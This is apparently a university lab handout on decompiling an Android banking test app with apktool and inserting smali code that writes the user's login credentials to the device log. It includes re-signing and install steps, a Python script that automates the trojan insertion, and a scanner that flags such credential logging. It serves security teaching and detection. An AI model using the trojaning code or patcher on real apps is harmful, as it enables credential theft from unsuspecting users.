Project 9: Decompiling and Trojaning an Android App with Smali Code (15 points)

Don't Be Evil

This is a nasty thing to do. Only distribute your trojaned apps in controlled test environments!

Please be responsible in how you use this information! If you commit crimes, I won't be able to save you.

What You Need for This Project

Purpose

We'll take an Android app and modify it to steal passwords.

This version just puts the passwords in the log, which is easy but not very dangerous.

A later project will post the stolen passwords on the Internet, which is a lot scarier.

Signing an APK File

First, we'll make a signed APK file. This is a good thing to know how to do, to make your apps distributable to others. We need to do this now to create a signing certificate.

Android Studio should have a project open, such as "AndroidLabs-Base-Sam" or your "Hello World" app. If it does not, load one of those projects.

In Android Studio, click Build, "Create Signed APK...".

In the "Module" box, accept the default selection of app and click Next.

The next box asks for a "Key store path", as shown below.

Click the "Create new..." button.

Note for Windows Users

On Windows, you must type in the complete path, including the filename and extension, such as
c:\Users\Student\Desktop\p9\p9cert.jks
The "browse" button is useless on Windows.

Fill in the next box with any values you like, but put your real name in the "First and Last Name" field, as shown below.

Warning: don't put a comma in any of the fields, or Android Studio will stop with a Java error message.

Click OK.

Make a note of these items--you will need them later:
  • Key store path
  • alias
  • Key store password

The next box fills itself in automatically, as shown below.

Click Next.

In the next box, click Finish, as shown below.

A box pops up, saying "Signed APK's generated successfully", as shown below.

Downloading the "EMM - Vulnerable" App

This is a signed APK version of the same app we've been using for many projects.

On your computer, download the app from this link:

https://samsclass.info/128/proj/app-release.apk

Save the file somewhere you can find it, such as the Downloads folder.

Disassembling an APK with apktool

Go to

https://bitbucket.org/iBotPeaches/apktool/downloads

Download the latest version. When I did it on 2-1-15, it was "apktool_2.0.0rc3.jar".

Save the file in the same folder you used for the APK file, such as Downloads.

Open a Command Prompt or Terminal.

Change directory to the folder where you placed the downloaded files and run the apktool jar with java, as shown below.

cd Downloads

java -jar apktool_2.0.0rc3.jar d app-release.apk

Messages appear as apktool disassembles the app, as shown below.


Viewing Smali Code

Open Finder or Windows Explorer and navigate to your Downloads folder.

apktool created a folder named "app-release" next to the APK. Open it, and then open this series of folders inside it:

There are several smali files in there, as shown below.

Open RestClient.smali in a text editor.

You see the smali code.

Scroll down, or search for "performLogin(", to find the code shown below.

This is smali, the human-readable assembly form of Dalvik bytecode. Dalvik is the virtual machine Android uses to run apps compiled from Java, so every Java method in the app appears here as a .method block.

It's easy to see where the username and password are, as outlined in green above. In smali, a method's arguments arrive in the p registers (p0 is "this" for a non-static method, then p1, p2, ... in declaration order), which is why the two String parameters of this method are referenced as p3 and p4 below.

Comparing Java to Smali

The figure below shows the source code for the performLogin method in Java (as seen in Android Studio).

The statements outlined in green put the username and password into parameters.

Adding the Trojan Code

In file RestClient.smali, after the ".line 258" line, insert the code below.

Two things to check before you do: the trojan overwrites v0 and v1, so nothing the method still needs may be sitting in those registers at the insertion point, and the method's ".locals" directive must declare at least 2 registers. If it declares fewer, raise it to 2; smali recomputes the p-register aliases from that count, so p3 and p4 still refer to the same parameters.

Replace "YOURNAME" with your own name.

# EVIL TROJAN CODE LOGGING PASSWORD
const-string v0, "YOURNAME"
const-string v1, "USERNAME AND PASSWORD BELOW"
invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
invoke-static {v0, p4}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
# END OF EVIL TROJAN CODE
Your screen should look like this:

Save the RestClient.smali file.
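Doing this edit by hand is fine for one method, but the same change is easy to script, and scripting it makes the two checks above (right registers, enough locals) explicit. The script below is an added example written for this page; it is not part of the project or of the ExploitMe labs. It patches a constructed smali method modelled on performLogin (the method signature is an assumption chosen so that username and password land in p3 and p4, as on the page), computes the parameter registers from the method descriptor instead of hard-coding them, and raises .locals when it is below 2.

```python
import re

# Constructed sample smali modelled on the page's description of
# RestClient.smali; it is NOT the real file. The method signature is an
# assumption chosen so that username and password are p3 and p4.
SAMPLE_SMALI = """\
.class public Lcom/example/RestClient;
.method public performLogin(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
    .locals 1
    .line 258
    const/4 v0, 0x0
    .line 259
    return-void
.end method
"""

# The page's trojan; {tag}, {user} and {pw} are filled in by patch_method().
TROJAN_TEMPLATE = [
    "# EVIL TROJAN CODE LOGGING PASSWORD",
    'const-string v0, "{tag}"',
    'const-string v1, "USERNAME AND PASSWORD BELOW"',
    "invoke-static {{v0, v1}}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I",
    "invoke-static {{v0, {user}}}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I",
    "invoke-static {{v0, {pw}}}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I",
    "# END OF EVIL TROJAN CODE",
]

# .method <modifiers> <name>(<params>)<return>
METHOD_RE = re.compile(r"^\.method\s+((?:[\w-]+\s+)*)([\w$<>]+)(\(.*\)\S+)\s*$")


def parse_params(descriptor):
    """Split the parameter list of a descriptor such as
    (Landroid/content/Context;Ljava/lang/String;I)V into type tokens."""
    inner = descriptor[descriptor.index("(") + 1:descriptor.index(")")]
    types, i = [], 0
    while i < len(inner):
        start = i
        while inner[i] == "[":        # array dimensions prefix the element type
            i += 1
        if inner[i] == "L":           # object type runs up to and including ';'
            i = inner.index(";", i) + 1
        else:                         # primitive type is a single letter
            i += 1
        types.append(inner[start:i])
    return types


def param_registers(descriptor, is_static):
    """Map each parameter to the p-register holding it. p0 is 'this' for
    instance methods; long (J) and double (D) occupy two registers."""
    reg = 0 if is_static else 1
    mapping = []
    for t in parse_params(descriptor):
        mapping.append((t, f"p{reg}"))
        reg += 2 if t in ("J", "D") else 1
    return mapping


def patch_method(smali, method_name, tag, user_idx, pw_idx, after_line=258):
    """Insert the trojan into `method_name` right after its `.line after_line`
    directive. user_idx and pw_idx are 0-based positions of the username and
    password parameters in the descriptor. Returns the patched text."""
    lines = smali.splitlines()
    start, header = None, None
    for i, line in enumerate(lines):
        m = METHOD_RE.match(line)
        if m and m.group(2) == method_name:
            start, header = i, m
            break
    if start is None:
        raise ValueError(f"method {method_name} not found")
    end = next(i for i in range(start, len(lines)) if lines[i].startswith(".end method"))

    regs = param_registers(header.group(3), "static" in header.group(1).split())
    for idx in (user_idx, pw_idx):
        if regs[idx][0] != "Ljava/lang/String;":
            raise ValueError(f"parameter {idx} is {regs[idx][0]}, not a String")
    user, pw = regs[user_idx][1], regs[pw_idx][1]

    body = lines[start:end]
    # The trojan clobbers v0 and v1, so the method needs at least two locals.
    # Raising .locals is safe: smali recomputes the p-register aliases from
    # that count, so p3/p4 still name the same parameters.
    for j, line in enumerate(body):
        lm = re.match(r"^(\s*)\.locals\s+(\d+)\s*$", line)
        if lm:
            if int(lm.group(2)) < 2:
                body[j] = f"{lm.group(1)}.locals 2"
            break
    else:
        raise ValueError("no .locals directive (method may use .registers instead)")

    # Insert right after the requested .line directive, matching its indent.
    for j, line in enumerate(body):
        lm = re.match(rf"^(\s*)\.line\s+{after_line}\s*$", line)
        if lm:
            body[j + 1:j + 1] = [lm.group(1) + t.format(tag=tag, user=user, pw=pw)
                                 for t in TROJAN_TEMPLATE]
            break
    else:
        raise ValueError(f".line {after_line} not found in {method_name}")

    return "\n".join(lines[:start] + body + lines[end:]) + "\n"
```

To use it on the real file, read RestClient.smali, call patch_method with the method name, your tag and the 0-based positions of the username and password parameters in the descriptor, and write the result back; it refuses to patch if either chosen parameter is not a String or if the .line directive is missing.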

Building the App

Now we need to rebuild the APK file from the modified smali code.

In a Terminal or Command Prompt, execute this command:

java -jar apktool_2.0.0rc3.jar b app-release
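Before rebuilding, it is worth confirming that the insertion landed, and the same check is how a reviewer would spot this kind of trojan in someone else's APK: look for android.util.Log calls that are fed a parameter register of the enclosing method. The script below is an added example for this page, not code from the project or the ExploitMe labs. It runs over constructed smali (not the real RestClient.smali) containing a method trojaned as above, a harmless method that logs only constants, and a static method whose p0 is a real argument rather than "this"; scan_tree() applies the same check to every .smali file under an apktool output folder.

```python
import os
import re

# Constructed smali (NOT the real RestClient.smali). performLogin leaks two
# parameters to the log as the page's trojan does; logStatus logs only
# constants; logToken is static, so its p0 is a real argument, not 'this'.
SAMPLE_SMALI = """\
.class public Lcom/example/RestClient;
.method public performLogin(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
    .locals 2
    .line 258
    const-string v0, "YOURNAME"
    const-string v1, "USERNAME AND PASSWORD BELOW"
    invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    invoke-static {v0, p4}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    return-void
.end method
.method public static logStatus(I)V
    .locals 2
    const-string v0, "EMM"
    const-string v1, "status changed"
    invoke-static {v0, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
    return-void
.end method
.method public static logToken(Ljava/lang/String;)V
    .locals 1
    const-string v0, "EMM"
    invoke-static {v0, p0}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
    return-void
.end method
"""

# .method <modifiers> <name>(<params>)<return>
METHOD_RE = re.compile(r"^\.method\s+((?:[\w-]+\s+)*)([\w$<>]+\(.*\)\S+)\s*$")
# invoke-static {regs}, Landroid/util/Log;->level(...)   (plain form only,
# invoke-static/range is not matched)
LOG_CALL_RE = re.compile(r"^\s*invoke-static\s*\{([^}]*)\},\s*Landroid/util/Log;->(\w+)\(")


def find_param_log_leaks(smali):
    """Return (method, log level, parameter registers) for every
    android.util.Log call that passes a parameter register of the enclosing
    method. For instance methods p0 is 'this' and is ignored; for static
    methods p0 is the first real argument."""
    leaks = []
    method, first_param = None, 1
    for line in smali.splitlines():
        m = METHOD_RE.match(line)
        if m:
            method = m.group(2)
            first_param = 0 if "static" in m.group(1).split() else 1
            continue
        if line.startswith(".end method"):
            method = None
            continue
        c = LOG_CALL_RE.match(line)
        if not (c and method):
            continue
        regs = [r.strip() for r in c.group(1).split(",") if r.strip()]
        p_regs = [r for r in regs
                  if r[0] == "p" and r[1:].isdigit() and int(r[1:]) >= first_param]
        if p_regs:
            leaks.append((method, c.group(2), p_regs))
    return leaks


def scan_tree(root):
    """Run the check over every .smali file under an apktool output folder
    (e.g. app-release/smali). Returns {path: leaks} for files with hits."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".smali"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8") as fh:
                    found = find_param_log_leaks(fh.read())
                if found:
                    hits[path] = found
    return hits


def report(smali):
    """One human-readable line per leaking call."""
    return [f"{m}: Log.{lvl}() receives {', '.join(regs)}"
            for m, lvl, regs in find_param_log_leaks(smali)]
```

Run against the patched tree (scan_tree("app-release/smali")) it should flag RestClient.smali with the two performLogin calls and nothing else that was not already logging its arguments; a hit in a method you did not touch is a finding in its own right.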

Re-Signing the APK

Since the code has changed, the old signature is invalid. We must sign it again.

To do that, we'll use the "jarsigner" tool, part of the Java Development Kit. jarsigner produces a JAR (v1) signature; newer Android versions prefer the APK Signature Scheme v2 signature produced by the apksigner tool in the Android SDK build-tools, and "apksigner verify" can also confirm that a rebuilt APK is correctly signed.

In a Terminal or Command Prompt, execute this command.

You will have to adjust the path after "-keystore" to match the location of your signing certificate.

The last parameter is your key's alias.

jarsigner -verbose -keystore ~/Box\ Sync/website/128/proj/p9cert.jks app-release/dist/app-release.apk proj9key
When you are prompted to, enter the key store password you chose earlier.

Troubleshooting

If you see "jarsigner not found", you are probably using Windows. The Java installer does not put the JDK tools on the PATH, so you need to set two environment variables manually.

Click Start, Computer.

Navigate to C:\Program Files\java and find out the full path to your jdk folder.

It will be something like C:\Program Files\Java\jdk1.6.0_02.

Now execute this command at an Administrator command prompt, with the correct jdk version. Leave out the quotes: cmd.exe would make them part of the value.

set JAVA_HOME=C:\Program Files\Java\jdk1.7.0_75
This setting lasts only for that Command Prompt window; to make it permanent, add JAVA_HOME in the Environment Variables dialog described next. You also need to add the JDK's bin folder to the PATH environment variable.

To do that, click Start, right-click Computer, click Properties, "Advanced System Settings", "Environment Variables".

Ensure that PATH is selected, and click Edit....

At the end of the path, insert this line, with the correct jdk version:

C:\Program Files\Java\jdk1.7.0_75\bin
Then log out and log in again.

Uninstalling the Old App

On your Android device, from the Home page, click the circle.

On the APPS tab, click Settings. Click Apps. Click "EMM - Vulnerable". Click Uninstall. Click OK.

Emailing the APK

Email the APK to the Gmail account your Android device is using.

On your Android device, click the circle and open the Gmail app.

Open your email, as shown below.

Installing the Trojaned App

Click on the attachment.

Click Install.

Click Open.

Starting the Server

You should have the server software for this app from the earlier projects.

If you are on a Mac, execute these commands, adjusting the path in the first command to the correct path for your machine:

cd /Users/sambowne/Downloads/LabServer-master

python app.py

If you are using Windows, execute these commands, adjusting the path in the first command to the correct path for your machine:
cd c:\Users\student\Downloads\LabServer-master\LabServer-master

app.py

You should see the message: "Serving HTTP on port 8080", as shown below.

Leave this window open.

Adjusting the Server IP Address

In Android, in the "EMM - Vulnerable" app, on the lower right corner, click the three-dot icon.

Click Reset.

Click the three-dot icon again.

Click Preferences.

Click "Bank Service Address".

Adjust the address to match the real IP address of your computer, as shown below.

(To get that address, run IPCONFIG or ifconfig.)

Click OK.

Opening Android Device Monitor

In Android Studio, click Tools, Android, "Android Device Monitor".

In the lower pane of Android Device Monitor, click the LogCat tab.

Logging In

In the Android app, at the lower left, click the curved back-arrow icon.

Log in as jdoe with a password of password.

In Android Device Monitor, find the red log entries with your name on them, as shown below.

Saving a Screen Image

Make sure these three items are visible. Save a full-desktop image of this screen. On a Mac, press Command+Shift+3. On a PC, press Shift+PrntScrn and paste into Paint.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the image with the filename "YOUR NAME Proj 9", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the image to cnit.128sam@gmail.com with the subject line: Proj 9 from YOUR NAME

Sources

How to unpack / pack an APK file

Dancing with dalvik

ExploitMe Mobile Android Labs


Last modified 3-3-15 6:57 am